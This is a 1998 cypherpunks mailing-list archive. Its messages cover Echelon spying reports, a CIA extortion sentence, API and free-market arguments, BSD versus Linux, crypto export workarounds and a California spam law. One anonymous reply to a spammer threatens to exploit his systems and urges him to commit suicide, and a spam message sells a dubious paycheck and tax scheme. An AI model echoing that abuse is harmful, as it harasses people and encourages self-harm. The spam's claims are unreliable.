But the disclosure of Echelon could soon resonate across the Atlantic
after the European Parliament action. Furthermore, it could
complicate current negotiations between the U.S. and the European
Union over encryption programs that scramble or encode computer
information, said Parliament member Ford.

The U.S. has been lobbying for back-door access to such codes for
security reasons.

Originally published on Sep 19 1998 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Sep 1998 23:15:10 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Fwd: [Spooks] NSA Allegedly Spied on Businesses
Message-ID: <199809300407.VAA08329@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Bridget973@aol.com
Subject: IP: Fwd: [Spooks] NSA Allegedly Spied on Businesses
Date: Tue, 29 Sep 1998 21:37:12 EDT
To: ignition-point@majordomo.pobox.com

Subject:         [Spooks] NSA Allegedly Spied on Businesses
Date:             Sat, 26 Sep 1998 14:36:35 -0500
From:            Bob Margolis <rttyman@wwa.com>
To:                Spooks <spooks@qth.net>


U.S. Spy Agency Helped U.S. Companies Win Business Overseas-Report

September 21, 1998

Nikkei English News: TOKYO (AP)--A U.S. intelligence agency
electronically eavesdropped on  foreign companies and passed
information to U.S. competitors to help them win business
overseas, a major Tokyo  newspaper reported Saturday.

The National Security Agency monitored phone calls, faxes and
electronic  mail  of European and Japanese companies since at
least 1990, the Mainichi  newspaper said, citing a report
Wednesday by the European Parliament, the European Union's
legislature.

The newspaper quoted the report as saying the NSA, in an
operation named "Echelon," used its vast eavesdropping network
to listen to business  negotiations.

The Central Intelligence Agency and British intelligence were
also involved, the paper said.

The paper said the report was submitted Wednesday to parliament
by its research bureau. Some of the findings also appeared in a
January report, the paper said.

In one case, the NSA monitored talks between French electronics
company Thomson-CSF and the Brazilian government over sale of a
radar system. An unnamed U.S. company ended up winning the
contract, the paper said.

The paper also said the NSA listened in on 1990 negotiations
between Japan's NEC Corp. and the Indonesian government over the
purchase of telecommunications machinery.

It used the information to urge Jakarta to award half the contract
to AT&T, the paper said.

---
Submissions should be sent to spooks@qth.net
To unsubscribe, send "unsubscribe spooks" to majordomo@qth.net



--
bridget973@aol.com
Black Helicopters on the Horizon:
http://members.xoom.com/bridget973





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Sep 1998 23:15:10 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Fwd: [Spooks] CIA Operative sentenced to five years imprisonment
Message-ID: <199809300407.VAA08340@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Bridget973@aol.com
Subject: IP: Fwd: [Spooks] CIA Operative sentenced to five years imprisonment
Date: Tue, 29 Sep 1998 22:03:52 EDT
To: ignition-point@majordomo.pobox.com


http://www.abcnews.com/wire/US/AP19980925_1626.html

AP News Service
WASHINGTON (AP) _ A former CIA operative was sentenced to five years in prison
today for trying to extort $1 million from the agency in exchange for his
silence about government eavesdropping operations.  Douglas Fred Groat, 51,
pleaded guilty to the extortion charge in July. As part of the plea agreement,
federal prosecutors dropped four counts of espionage, including charges that
Groat told two foreign governments the CIA had cracked their coded
communications. 
U.S. District Judge Thomas F. Hogan said Groat's actions appeared to stem from
his ``almost becoming obsessed'' about a job dispute with the CIA. 
``I don't think at any time you really had any intention of trying to harm our
national security,'' Hogan said.  

The judge said he would recommend housing Groat in a minimum-security prison
and ordered him to serve three years of supervised release after completing
his sentence. Groat, a burly, bearded man, did not speak in the courtroom
except to clarify part of his written statement to the court, which was not
immediately
released.

He said that in complaining about the ``harsh conditions of my solitary
confinement,'' he did not mean to imply that any federal officials treated him
harshly. His lawyer, public defender Robert L. Tucker, said the case was ``a
shame'' and that Groat's actions ``everybody would agree had their genesis in
a dispute with the CIA about employment.'' 

Prosecutors said in July a trial in the case could have forced them to
disclose sensitive national security information. Groat agreed to help the
government sort out whether his activities damaged
national security, and he promised to submit any books, articles or interviews
to federal officials for security review.  Prosecutor Ron Walutes told Hogan
the government was ``fully satisfied'' with Groat's cooperation since his
guilty plea on July 27.  Groat, a former employee of the CIA division that
develops eavesdropping plans and code-breaking technology, worked for the CIA
from 1980 until he was fired in October 1996. Early in his career, he served
as a field operative
participating in break-ins of foreign embassies. 
In a summary agreed to in July by Groat, prosecutors said he sent a series of
letters to the CIA in 1996 and 1997 demanding $1 million and saying that in
return he would not engage in ``any activities which may hinder present or
future intelligence gathering efforts.'' Officials did not identify the two
countries Groat had been accused of aiding. Groat was held without bail since
he was arrested in April. He will be able to collect his CIA pension when he
turns 62. 
He could have been sentenced to up to 20 years in prison and a $250,000 fine. 
Groat had been the third current or former CIA employee arrested on espionage
charges in the past four years. However, he was lower-ranking than Alrich Ames
and Harold Nicholson, who pleaded guilty and are imprisoned for selling
secrets to Moscow. 

Copyright 1998 AP News Service. All rights reserved



---
Submissions should be sent to spooks@qth.net
To unsubscribe, send "unsubscribe spooks" to majordomo@qth.net



--
bridget973@aol.com
Black Helicopters on the Horizon:
http://members.xoom.com/bridget973





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 29 Sep 1998 22:43:02 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199809300345.WAA10211@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Tue, 29 Sep 1998 18:41:25 -0700

> Jim Choate wrote:
> > The only objection to releasing an API is to 
> > stifle competition, *THAT* is a bad thing.
> 
> There are a number of other reasons -- principally support and backwards
> compatibility costs. If you release an API for a commercial application
> for ISVs, you better make sure it is relatively bug-free and mature. As
> soon as someone else's code relies on that API, you are stuck with
> making sure it continues to work as the product evolves.

This is bogus reasoning. If the API is released there is *more* motivation
for the original distributor to keep backward compatibility and bug-free. If
it isn't some pissed off set of programmers will write a replacement.
Furthermore the motivation to keep future compatibility is also increased.

You want quality code that is bullet-proof then release the API and let the
fittest survive.

If nothing else it's going to determine if your as bad-assed programmer as
you think you are.

> There is nothing wrong with public and private APIs, and we hope that
> the ad hoc private APIs from some midnight-oil-burning-hack to get the
> product to ship on time that have useful functionality will eventually
> be integrated into a mature public API.

If you release the API you'll find those midnight hacks go away, *not*
increase as you seem to be claiming. The history of quality over time of the
Open Software producers amply proves this.

Solaris, HP, BSD, NT, etc. *wish* they were as stable and popular as Linux.

> Modular OOP design means you have lots of interfaces, you don't
> necessarily want people to be able to dig in-between all the pieces of
> your program -- often you cannot protect application/data integrity if
> they do.

Malarky. If you're data structures are that fragile then you need to go back
to the drawing board.

> > Had Microsoft, for example, been required to publish their 
> > API's by the market we wouldn't be spending all this effort
> 
> You state free-market and then you are *requiring* someone to do
> something? How do you resolve that contradiction? Require = Force !=
> Free[dom]

Free-market *requires* fair competition, don't blame that requirement on me
I had nothing to do with it. Free-market does not mean carte blanche as to
what manufacturers can do, it means there are no outside regulations
applied. It says *nothing* about internal regulation applied by either the
producer or the consumer.

If you are seriously saying that the only workable market scheme is to let
people cheat and steal from others (which is what poorly written and
unreliable code does) then you need to quit typing and starting thinking.

> As far as *commercial* software vendors go, Microsoft is one of the
> better companies for publishing APIs and creating useful APIs and tools

Malarky. Microsoft has so many hidden, undocumented, incomplete API's it
isn't even funny.

> for Rapid Application Development. Do you subscribe to MSDN? Please do
> before you crucify Microsoft for lack of APIs, if anything they have too
> many.

Subscribe to the MSDN?

I work for Tivoli in Austin as a Senior Software Verification Engineer. I
spend about 8-10 hours a day banging on software running on:

SunOS 4.x
Solaris 2.x
HP/UX 9.x
HP/UX 10.x
AIX 3.x
AIX 4.x
WinNT 4.0
WinNT 3.51
W4W
W3.11
OS/2 3.x
OS/2 4.x
AS/400
Novell 3.x
Novell 4.x
IRIX 4.x
IRIX 5.x
DG Unix
Digital Unix
NextStep

networked via,

TCP/IP
IPX
SNA
Token Ring

databases we support,

Oracle
Sybase
Informix
DB2
DBMX

I've also worked on:

Pick
Linux (since 0.42)
QNX
SCO
Interactive
BSD
CP/M
C64
AmigaDOS
4DOS

It requires that I comprehend and write shell scripts, Perl, C, C++, REXX,
4TEST, CORBA IDL on these platforms. I started analog and digital electronics
in 1969, I started programming in BASIC/8 on a PDP 8/e in 1973. I built my
first 6800 based machines from the ground up in 1974 when I was a freshman in
high school. I've been employed in a hardware or software position since 1978
when I graduated high school. I've owned more different types of machines
than I care to remember. I've worked in a science museum building 40
exhibits over 7 years (2 of which are in the Smithsonian, 1 is at the
Exploratorium and 1 is at the Chicago Museum of Science and Technology,
and I worked on the IBM Leonardo exhibit.) and had the pleasure of running
their computer group for 5 of those years. I taught astronomy at the museum
for 3 years and explained exhibits to the visitors for 7 years. I've been
using MS Dos and Windows since the 1.0 days. I worked for the DoD building
non-Von Neumann computers (RTL architecture). I hold a NASA certification
(expired) for space rated soldering and mechanical assembly. I used to work
on cesium beam atomic clocks and LORAN-C equipment. I run my own custom
development business since 1984, and it's been on the internet since 1994
via ISDN. I've been running a BBS of some sort since '76 and had one
continously online since '83. I helped develop TurBoard the first NAPLPS
bbs software. I program in assembly on PDP/VAX 11, 6800, 6502, 8080, z80,
68k, 80x86, Sparc RISC, both types of POWER chips, & 8051.

My current assignment is to build an automated software test engine that
will test *all* the above OS'es with all the Tivoli products (are you
familiar with Tivoli?), with all the point-patches, maintenance releases,
and service packs installed in a user defined combinatorial environment.

Microsoft's API's suck rocks.

What do you do for a living?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 29 Sep 1998 23:53:11 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199809300454.XAA10768@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 30 Sep 1998 00:21:19 -0400 (EDT)
> From: Vlad Stesin <rmiles@Generation.NET>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> > 
> > Solaris, HP, BSD, NT, etc. *wish* they were as stable and popular as Linux.
> > 
> 
> Which BSD are you talking about? From my personal and professional
> experience, OpenBSD, NetBSD and FreeBSD proved to be just as stable (and
> OpenBSD even more stable and reliable) than Linux. All three of them are

> Take a look at http://www.openbsd.org/crypto.html for more info.
> 
> I hope you meant BSD/OS when you mentioned BSD :-)

Well I've used all three version. In particular after I got my current Sun
4/380 from the local CACTUS Unix user group I tried several variaties of BSD
on it and none of them have stayed up as long, had as many applications
available for them, or been easier to debug than Linux SPARC (and that is
behind x86 by a couple of generations - though that should change in the
immediate future). I also tried it on my Amiga 2000 when there wasn't a
working version of Linux for it. I've got like 5 different disk sets I've
tried over the last 3 years, thanks I'll stick with Linux SPARC. I've even
got an *old* version of BSD before they went with their current license scheme
that I used when I worked at Compu-Add from '91 through '92 in their POS
support department because one of our food chain customers liked the way
the box arched....:)

I have yet to see any BSD installation with a total uptime greater than 8-10
weeks whereas I've seen my *old* 1.1.59 Linux version (still running on
einstein.ssz.com at this very moment) stay up for over 6 months between
reboots (and even then it wasn't a requirement, the clock keeps wondering off
and by 6 months it's nearly 12 hours ahead).

I have no desire to get into a OS war, I currently use like 6 different
os'es at home - to each their own.

But to assuage your curiosity I prefer AmigaDOS and/or Plan 9 with Logo
for programming (now if I could only find a decent Logo compiler),
though Amoeba is starting to look pretty interesting. I'd use BeOS a lot
more if I thought for one second there was a real future for it, even though
I do try each release.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vlad Stesin <rmiles@Generation.NET>
Date: Tue, 29 Sep 1998 23:23:29 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199809300345.WAA10211@einstein.ssz.com>
Message-ID: <Pine.SOL.3.96.980930001018.8729A-100000@sparkle>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Solaris, HP, BSD, NT, etc. *wish* they were as stable and popular as Linux.
> 

Which BSD are you talking about? From my personal and professional
experience, OpenBSD, NetBSD and FreeBSD proved to be just as stable (and
OpenBSD even more stable and reliable) than Linux. All three of them are
open-source. The OpenBSD project emphasizes the importance of security and
cryptography, and since it ships from Canada there are few export
restrictions. 

Take a look at http://www.openbsd.org/crypto.html for more info.

I hope you meant BSD/OS when you mentioned BSD :-)

Regards,
-- 
Vlad Stesin						(514) 845-5555
UNIX Systems Administrator / Generation.NET     vstesin@Generation.NET
Montreal (PQ), Canada  B4 44 CE 60 09 71 38 6F 51 BF DC 5F 12 E9 70 7C 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M Taylor <mctaylor@privacy.nb.ca>
Date: Tue, 29 Sep 1998 22:27:19 +0800
To: cypherpunks@cyberpass.net
Subject: Halifax, Canada PGP key-signing party
Message-ID: <Pine.LNX.3.95.980930002003.4613B-100000@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain




The Nova Scotia Linux Users Group (nsLUG, www.nslug.ns.ca) is considering
a PGP key-signing party in October 1998 in the metro Halifax area.

If you are interested, please contact me, so I can inform you of the exact
date & location.

--
M Taylor   mctaylor@  /  glyphmetrics.ca | privacy.nb.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Tue, 29 Sep 1998 19:56:13 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Remailers, PGP, and a Project Suggestion
In-Reply-To: <19980929051529.13737.qmail@hades.rpini.com>
Message-ID: <361d80cd.584564481@news>
MIME-Version: 1.0
Content-Type: text/plain



On 29 Sep 1998 12:59:44 -0500, Adam Back <aba@dcs.ex.ac.uk> wrote:

>
>
>Anonymous writes:
>> >        So, what you are saying is that you want crypto to protect yourself
>> >from government intrusion, but are unwilling to actually WRITE the code for
>> >fear that the government will lock you up.
>> 
>> That's about right. I will write the code for myself. I will not release it
>> since I'm in the U.S. and it gives the thugs one more reason to come after
>> me. That job is better suited for somebody who is outside the U.S. or is
>> actually willing to sit through a long grand jury investigation, possible
>> indictment, trial, conviction, jail time, and life as a convicted felon.
>
>Ah come on, it isn't that bad.  Just put it on a crypto site with some
>dumb revolving password scheme, or give it to someone else to put no
>theirs.  It'll be on replay with-in a few hours, if anyone is
>interested in the code.
>

Also, couldn't you just print out the sorce code (in a nice OCR font) and
mail it to somebody in another country, like with the PGP books?
Is anyone out there (not in the US) willing to do this?

What about MIT?  They distribute pgp.  Perhaps someone there could be
persuaded to maintain a broader crypto archive.

-- Phelix




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 30 Sep 1998 03:18:47 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284706@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> This is bogus reasoning. If the API is released there is 
> *more* motivation for the original distributor to keep 
> backward compatibility and bug-free.

Duh, I never said otherwise. More motivation and more cost.

Sometimes (more often than not) it takes a couple drafts and re-writes
before things are the way they ought to be. APIs will often progress
from private to public as an evolution from immaturity to maturity,
disorganization to organization, ad hoc hack to flexible functionality,
custom purpose to generic usefulness. You evidently completely missed
that point.

> You want quality code that is bullet-proof then release the 
> API and let the fittest survive.

Which is fine unless you are liable to support the inferior.

> If you release the API you'll find those midnight hacks 
> go away, *not* increase as you seem to be claiming.

Midnight hacks will never go away.

But again, you missed my point. I stated many APIs start out as midnight
hacks.

> Solaris, HP, BSD, NT, etc. *wish* they were as stable and 
> popular as Linux.

Let's not start OS wars. Each to their own, OSs are tools not religions.

> Free-market *requires* fair competition

By whose misguided definition? Free market required freedom (freedom
requires absence of coercive force), nothing else. Freedom is about
actions (motion), not static states (past/present/future), and so is
Competition. Id est, competition includes potential competition, a free
capital market guarantees potential competition, only force [regulation]
can hinder that.

> it means there are no outside regulations applied. 
> It says *nothing* about internal regulation applied 
> by either the producer or the consumer.

"Regulation" generally = political power (= force). Whether than is
externally applied or internally applied under the threat of external
force makes no difference. When the politicos talk about wanting
deregulation and industry self-regulation, what they really mean is they
want industry to bow to their whim under threat of their arbitrary
power. Such actions then avoid the scrutiny and protections
theoretically provided by the political/legal system.

The only legitimate force is economic -- the decision to purchase or not
to purchase, or to purchase a competing or alternative product. Economic
force is not a regulator of the free market, it is its heart and soul,
the essence of the free market. Economic force requires absence of
political force to truly work properly.

> If you are seriously saying that the only workable market 
> scheme is to let people cheat and steal from others
> (which is what poorly written and unreliable code does)

How so? You have a choice to consume or not to consume, there is no act
of coercive force, I cannot steal from you without it. Cheat I may, a
fool and his money are easily parted. Civil liability and reputation
naturally regulate such things, no govt. regulation necessary. [And you
say, but wait, civil liability requires govt. regulation -- it does now
but it need not, free market legal systems can provide such with
reputation instead of guns as its basis]

> Malarky. Microsoft has so many hidden, undocumented, 
> incomplete API's it isn't even funny.

Did I say they did not? I've worked at Microsoft, I not only know that
but I know why (and it's no conspiracy, chaos is more like it). 

They also have good many published APIs, and at the application layer
they are way ahead of most other vendors. At the OS layer I think open
source will win out, so you are preaching to the choir.

Open source will prevail if it makes economic (business) sense, all
other reasons are corollary. Regulation will destroy the free market
that could make open source viable.

     "There is a fantasy that open source and capitalism are 
     incompatible," Allman said. That misconception was at the 
     center of the decision to drop the "freeware" moniker in 
     favor of "open source." As Allman and others explained, 
     open source is a model for doing business, for making money.

(source: http://www.upside.com/texis/mvm/story?id=3564b5500)


	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Sep 1998 18:20:05 +0800
To: Andreas.Poliza@Golive.com
Subject: GoLive CyberStudio 30-day Activation Key
Message-ID: <199809292321.BAA28011@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Dumbshit,

Thank you for spamming the Cypherpunks list with an ad for your crippleware
and your lame, pathetically designed web site.

Your official 30-day activation key is: ISUCKANDCANTWRITEHTMLANDISPAM

You'll need to enter this key when you try to activate your brain.

Included in response to all spams to the Cypherpunks list are free tests
which will be run on your system. Any security holes we find will not be
reported, but exploited.

NOTE: If you are using FuckIt Spammer 1.0.x to spam your ad, please make
sure you walk off a high-rise ledge and fall several hundred feet or we may
have to make sure you do it, and you probably don't want that.

If you have questions about your computer security, you do not need to send
to Cypherpunks. You have already requested that your machine be checked for
all security holes and that any found will be exploited to make you look
even stupider than you make yourselves look. We also suggest you learn how 
to make a web site. Please visit http://www.anybrowser.org/campaign/. If you
don't find your answers there, please walk in front of an 18-wheeler going
70mph, or call 911 and phone in a bomb threat.

When you are ready to put yourself out of our misery, please slash your 
wrists and play vampire. It's simple so your simple minds should be able to
handle it, but it is a little messy.

Sincerely,

The Cypherpunks
cypherpunks@cyberpass.net

On Tue, 29 Sep 1998 sales@golive.com spammed:

>
> Dear Fritzie,
>
> Thank you for downloading the GoLive CyberStudio Tryout
> software.
>
> Your official 30-day activation key is: TRIA1MT23NFJD8MXGGJ85UDA
>
> You'll need to enter this key when you first start-up the
> software.
>
> Included with the GoLive CyberStudio installation are the
> latest Release Notes and New Product Features for GoLive
> CyberStudio.
>
> NOTE: If you are using Stuffit Expander 4.5.x to decode and
> decompress PDF documents, please make sure the cross
> platform preference and the option "Convert Text Files to
> Macintosh Format" is set to "Never".
>
> If you have questions about how to use the Tryout software,
> GoLive's knowledgeable Technical Support staff is available
> to assist you. We suggest you first check the Technical
> Support section of our Web site www.golive.com. If you don't
> find your answers there, please send us an email at
> support@golive.com or call 1-800-554-6638.
>
> When you are ready to purchase GoLive CyberStudio or if you
> want to know more about why GoLive CyberStudio is the best
> product for Web site design, please return to our Web site
> or contact me at 1-800-554-6638 or 1-650-463-1580.
>
> Sincerely,
>
> Dan Fernandez
> Director US Sales
> GoLive Systems
> Sales@Golive.com
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 1 Oct 1998 22:44:39 +0800
To: Tim May <tcmay@got.net>
Subject: Re: New California Spam Law is Bullshit
In-Reply-To: <v03130301b238bcb67703@[209.133.20.6]>
Message-ID: <Pine.BSF.3.91.980930031959.5708C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Got an actual cite for this, or better yet a url to the actual statute?

On Wed, 30 Sep 1998, Tim May wrote:

> At 6:43 PM -0700 9/30/98, Max Inux wrote:
> >On Wed, 30 Sep 1998 2001files@usa.net wrote:
> >
> >Dear spammer,
> >
> >Nice threats are attached to this spam.  I love new ideas from the
> >spamming community. Please be aware by not  including a real human email
> >address (specifically stated) and a 1800 number to call to be removed,
> >you are in violation of California law.
> 
> Think twice before citing this new law....
> 
> Whatever one thinks about unsolicited e-mail, the provisions of this new
> California bill are frightening to any supporter of liberty.
> 
> * the requirement that mail have a "real" name attached to it runs afoul of
> the right to anonymous messages, supported in various cases (Talley, for
> example). A requirement that e-mail be identified is no different from a
> requirement that pamphlets and articles have "real" names on them. So much
> for the First Amendment.
> 
> (Oh, and the _commercial_ nature of UCE has nothing to do with the First
> Amendment issues, unless one thinks the canonical First case, Sullivan, is
> meaningless because the New York Times was "commercial speech.")
> 
> * think of the implications for anonymous messages, through remailers
> 
> * and where does the "must have a toll-free number" bullshit come from?
> Think about it. It may sound _nice_ to demand that people have toll-free
> numbers, but where is the constitutional support for such a taking?
> 
> And so on.
> 
> --Tim May
> 
> Y2K: A good chance to reformat America's hard drive and empty the trash.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 30 Sep 1998 08:44:32 +0800
To: ukcrypto@maillist.ox.ac.uk
Subject: hoodwinking  congress
Message-ID: <36123260.2E7B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain



Wednesday 9/30/98 6:57 AM

J Orlin Grabbe
John Young

I read      Operating Systems
           Netscape & Intel Grab On to Red Hat
                                 Linux
                   as Windows NT Alternative

at http://www.aci.net/kalliste/ this morning.

I have to get my "green machine" http://www.metriguard.com/HCLT.HTM
assembler code ported to Visual Basic 6.0 using MASM 6.11.

Yesterday I discovered that VB 6.0 uses the flat model.  Thirty-two bit
addresses.
No segment registers.

No longer will code be backward compatible on Intel processors.

One of my next steps is to get the digital FX working, of course, then
port the PC
sides to NT.

VB 6.0 is using Microsoft's optimized C compiler to do the Visual Basic
compilation!

I learned yesterday evening that the PC Data System in Australia is
grading lumber at
2,000 feet per second.

I was in Grangeville, Id at Sherer planer mill in about January of 1996
testing out PC Data System.

  PC Data System - Pentium PC & Windows (R) software system for
production-line lumber     testing - CLT & HCLT 
http://www.metriguard.com/METPROD.HTM

I was told last night that Sherer system was only running 800 per
minute.

2 x 12 about 16 feet long planks were running continuously through the
machine at Sherer.  Wewear ear plugs the noise was deafening.

Sure be fun to get this mess settled so that I could do more work with
NT.

We are in a lull in the GREAT FIGHT.  http://jya.com/whpfiles.htm

I thoroughly enjoyed http://www.jya.com/itl-news.htm government crypto
propaganda attempt in view of Black and White.
http://www.aci.net/kalliste/bw1.htm 
http://www.zolatimes.com/v2.29/bw1.html

Let's hope some FINALLY figure out that NSA, NIST, and the FBI are
hoodwinking 
congress on the crypto issue merely for business reasons.  

Let's all hope for settlement before this matter gets WORSE.

Later
bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 2001files@usa.net
Date: Wed, 30 Sep 1998 11:07:25 +0800
To: cypherpunks@cyberpass.net
Subject: Increase Your Paycheck Next Week
Message-ID: <199809301608.JAA07148@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



Would you like to get a pay raise next week without asking your boss?   Then this very special report, "Money Power," is for you!

If you have a regular job - not working in your own or a family business - and you get a regular paycheck, we can show you how you can give yourself a HUGE RAISE in your very next paycheck.  At least between 20% - 30% more than what you are getting now.  Yes, your paycheck will be increased substantially!

	* Example:  If your take home pay is $400 net per week, you can take home $440 - $500 the very next week and every week thereafter!

No Gimmicks!  Everything is perfectly legal.

"Money Power" is written in three parts:

	*Part I - shows you exactly what to do so you can give yourself a raise in your next paycheck.  You decide how big a pay raise you want to give yourself!

	*Part II -  shows you how to protect yourself, your family, your home, and your assets without paying big money -- just $85 per year to legally protect your liability 100% against bill collectors and debts.

	*Part III - shows you how you can legally deduct household expenses - utilities, gardener, supplies, repairs, and more from your income taxes.  Absolutely No Gimmicks!  Everything is legal.

This is NOT a "get rich quick" scheme or some other scam.  We are sure you have seen lots of them.  And this is NOT a "tax protester" who refuses to pay income taxes.  The author of this report pays taxes every year - of course, as little as legally possible.  It's our opinion it is not good to zero out completely.  But, you can - it's your choice.

Using the methods in this report, the rich become richer.  And poor people become poorer when they don't take advantage of these techniques.  Your chances of being audited by the IRS - just for using these methods - are near zero.

	* We are so sure "Money Power" will work for you, here is our risk-free guarantee.  If you don't get at least 100 times more money in your paycheck in one year than the cost of this report, we will double your money back!  How's that for a guarantee?
                      ---------------------------------

Now, here's one more offer you will find hard to refuse.  We have a Reseller Program whereby you can make money selling this report.  When you purchase "Money Power," you will also get 1,000 FREE places to advertise on the Internet!  If you want to make some extra money - $500, $1,000 or more - just post ads on those sites and have the orders come to you.  For every order you send us, we will pay you $5.00:
	*You don't need a merchant account to process orders!  We do that.
	*You don't have to warehouse any inventory!  We do that.
	*You don't have to ship any merchandise.  We do that.
All you have to do is send us the orders.  We'll process checks, money orders, and credit cards and we will pack and mail the report.  And you get paid twice a month - on the 15th and the 30th!
                     ------------------------------------



And, listen.  America is a free country.  If you don't want an increase in your paycheck, that's fine.  And if you don't want to know how to protect your family, that's OK, too.  And if you don't want to save money on taxes, that's quite all right.  You are living in a free country.

But, if you need money - more money in your paycheck, act right now!  

The author of this report used to work for Corporate America earning over $100,000 a year.  After paying almost 40% in Federal taxes, 6.2% for Social Security, 1.45% for Medicare, 1.5% for the unemployment fund, and 3% for his employee benefits, he would bring home less than half of his yearly salary!  And then there was state income tax to pay!   He decided he had to do something so he could keep all the money!

"Money Power" is the result of the author's frustration and aggravation with the system and the research he did to change his situation.  These are methods they don't teach you in school!

It can't get much better than this.  This is a once in a lifetime opportunity because you may not receive this message again.  And you know how it is with opportunities ..... if you pass on one, you are not entitled to another for a long time.


Don't Delay!  The longer you wait to order, the longer you will wait for your raise!!!!


	>>>>>>>>>>>>> Please Note:  This report is for U.S. Citizens and Green Card holders only!  This program will not work for illegal immigrants or foreigners.<<<<<<<<<<<<

---------------------------------------------------------------------------

Here's how to order:

*****To order online, click on your reply button and type ORDER ONLINE in the subject line and we will e-mail you the online order form.

                             OR

Print out the convenient order form below NOW and mail it to:

	World Net Press
	Dept. EN-930
	P.O. Box 96594
	Las Vegas, NV 89193-6594
	
Payment Method:  
_____ Check     
_____ Money Order
_____ Visa
_____ MasterCard
_____ American Express
_____ Discover

_____ Yes, I want to order my copy of  "Money Power".  Price is $9.95 + $3.95 S/H = $13.90 and my order will be shipped by 1st Class Mail.   

Name_________________________________________________________________________

Address______________________________________________________________________

City/State/Zip_______________________________________________________________

Daytime Phone (__________)___________________________________________________

E-Mail Address_______________________________________________________________

Credit Card #_____________________________________________ Exp. Date_________

Cardholder Name (as it appears on the card)__________________________________

(Please make sure you include your phone number and e-mail address in case we have a question about your order.  Your credit card billing will reflect Road to Wealth, Inc.)



**************************************************************************
We are currently consolidating our mailing lists and need to update our database.  Our records indicate you may have inquired in the past. If this message has reached you in error, or the information is not correct, please accept our apology.  Follow the instructions below to be removed and we will honor your request.  We do not knowingly engage in spam of any kind.

Please click on your reply button and type REMOVE in the subject line only.  The software reads only the subject line, not the body of the message.
**************************************************************************

Please be advised we collect the e-mail addresses of all flamers, hackers, and users of abusive and vulgar language.  We submit these addresses to the FBI and Interpol on a monthly basis.  



